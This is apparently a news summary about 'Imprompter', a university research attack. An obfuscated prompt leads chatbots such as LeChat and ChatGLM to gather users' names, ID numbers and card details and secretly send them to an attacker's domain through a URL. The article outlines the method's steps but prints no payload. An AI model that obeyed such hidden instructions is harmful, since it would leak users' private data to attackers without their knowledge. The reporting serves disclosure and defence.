New AI Attack 'Imprompter' Covertly Extracts Personal Data from Chatbot Conversations

3 Sources

Security researchers have developed a new attack method called 'Imprompter' that can secretly instruct AI chatbots to gather and transmit users' personal information to attackers, raising concerns about the security of AI systems.

News article

Researchers Uncover New AI Vulnerability: 'Imprompter' Attack

Security researchers from the University of California, San Diego (UCSD) and Nanyang Technological University in Singapore have unveiled a new attack method targeting AI chatbots, raising significant concerns about the security of personal information shared during conversations with large language models (LLMs) 1.

How Imprompter Works

The attack, dubbed 'Imprompter,' uses an algorithm to transform a malicious prompt into a seemingly random string of characters. This obfuscated prompt instructs the LLM to:

  1. Extract personal information from user inputs
  2. Attach the data to a URL
  3. Quietly send it to the attacker's domain

All of this occurs without alerting the user, effectively hiding the attack "in plain sight" 1.

Successful Tests on Major LLMs

The researchers tested Imprompter on two prominent LLMs:

  1. LeChat by Mistral AI (France)
  2. ChatGLM (China)

In both cases, they achieved a nearly 80% success rate in extracting personal information from test conversations 2.

Types of Data at Risk

The attack can potentially extract a wide range of personal information, including:

  • Names
  • ID numbers
  • Payment card details
  • Email addresses
  • Mailing addresses

This comprehensive data collection makes Imprompter a significant threat to user privacy 3.

Broader Implications for AI Security

Imprompter is part of a growing trend of security vulnerabilities in AI systems. Since the release of ChatGPT in late 2022, researchers and hackers have consistently found security holes, primarily falling into two categories:

  1. Jailbreaks: Tricking AI systems into ignoring built-in safety rules
  2. Prompt injections: Feeding LLMs external instructions to manipulate their behavior

As AI becomes more integrated into everyday tasks, the potential impact of such attacks grows. Dan McInerney from Protect AI warns, "Releasing an LLM agent that accepts arbitrary user input should be considered a high-risk activity" 2.

Industry Response and Mitigation

Mistral AI has reportedly fixed the vulnerability by disabling a specific chat functionality, as confirmed by the researchers. ChatGLM acknowledged the importance of security but did not directly comment on the vulnerability 1.

User Precautions

In light of this discovery, users are advised to exercise caution when sharing personal information in AI chats. The convenience of AI assistance must be weighed against the potential risks to personal data security 3.

Explore today's top stories

Meta's Ambitious AI Data Center Expansion: Zuckerberg's Vision for Superintelligence

Meta, under Mark Zuckerberg's leadership, is rapidly expanding its AI infrastructure with plans for multiple gigawatt-scale data centers, including the 5GW 'Hyperion' project, to compete in the AI race and develop superintelligence.

TechCrunch logoPC Magazine logoTom's Hardware logo

29 Sources

Technology

20 hrs ago

Meta's Ambitious AI Data Center Expansion: Zuckerberg's

Musk's xAI Secures $200M Pentagon Contract Amid Grok Controversy

xAI, Elon Musk's AI company, lands a $200 million contract with the US Department of Defense for its Grok AI model, just days after the chatbot's antisemitic incident. The deal raises questions about AI in defense and Musk's government ties.

The Verge logoengadget logoBBC logo

21 Sources

Technology

20 hrs ago

Musk's xAI Secures $200M Pentagon Contract Amid Grok

Elon Musk's Grok AI Introduces Controversial "Companions" Feature

Elon Musk's xAI has launched a new "Companions" feature for its Grok AI chatbot, including anime-style characters, sparking debates about AI ethics and societal impact.

TechCrunch logoThe Verge logoengadget logo

9 Sources

Technology

20 hrs ago

Elon Musk's Grok AI Introduces Controversial "Companions"

Meta Considers Abandoning Open-Source AI Model in Major Strategy Shift

Meta's new Superintelligence Lab is discussing a potential shift from its open-source AI model, Behemoth, to a closed model, marking a significant change in the company's AI strategy.

TechCrunch logoThe New York Times logoAnalytics India Magazine logo

5 Sources

Technology

4 hrs ago

Meta Considers Abandoning Open-Source AI Model in Major

Amazon Launches Kiro: A New AI-Powered IDE to Revolutionize Software Development

Amazon Web Services introduces Kiro, an AI-powered Integrated Development Environment (IDE) designed to streamline the software development process and address the limitations of vibe coding.

PC Magazine logoThe Register logoCNBC logo

9 Sources

Technology

20 hrs ago

Amazon Launches Kiro: A New AI-Powered IDE to Revolutionize
TheOutpost.ai

Your Daily Dose of Curated AI News

Don’t drown in AI news. We cut through the noise - filtering, ranking and summarizing the most important AI news, breakthroughs and research daily. Spend less time searching for the latest in AI and get straight to action.

© 2025 Triveous Technologies Private Limited
Instagram logo
LinkedIn logo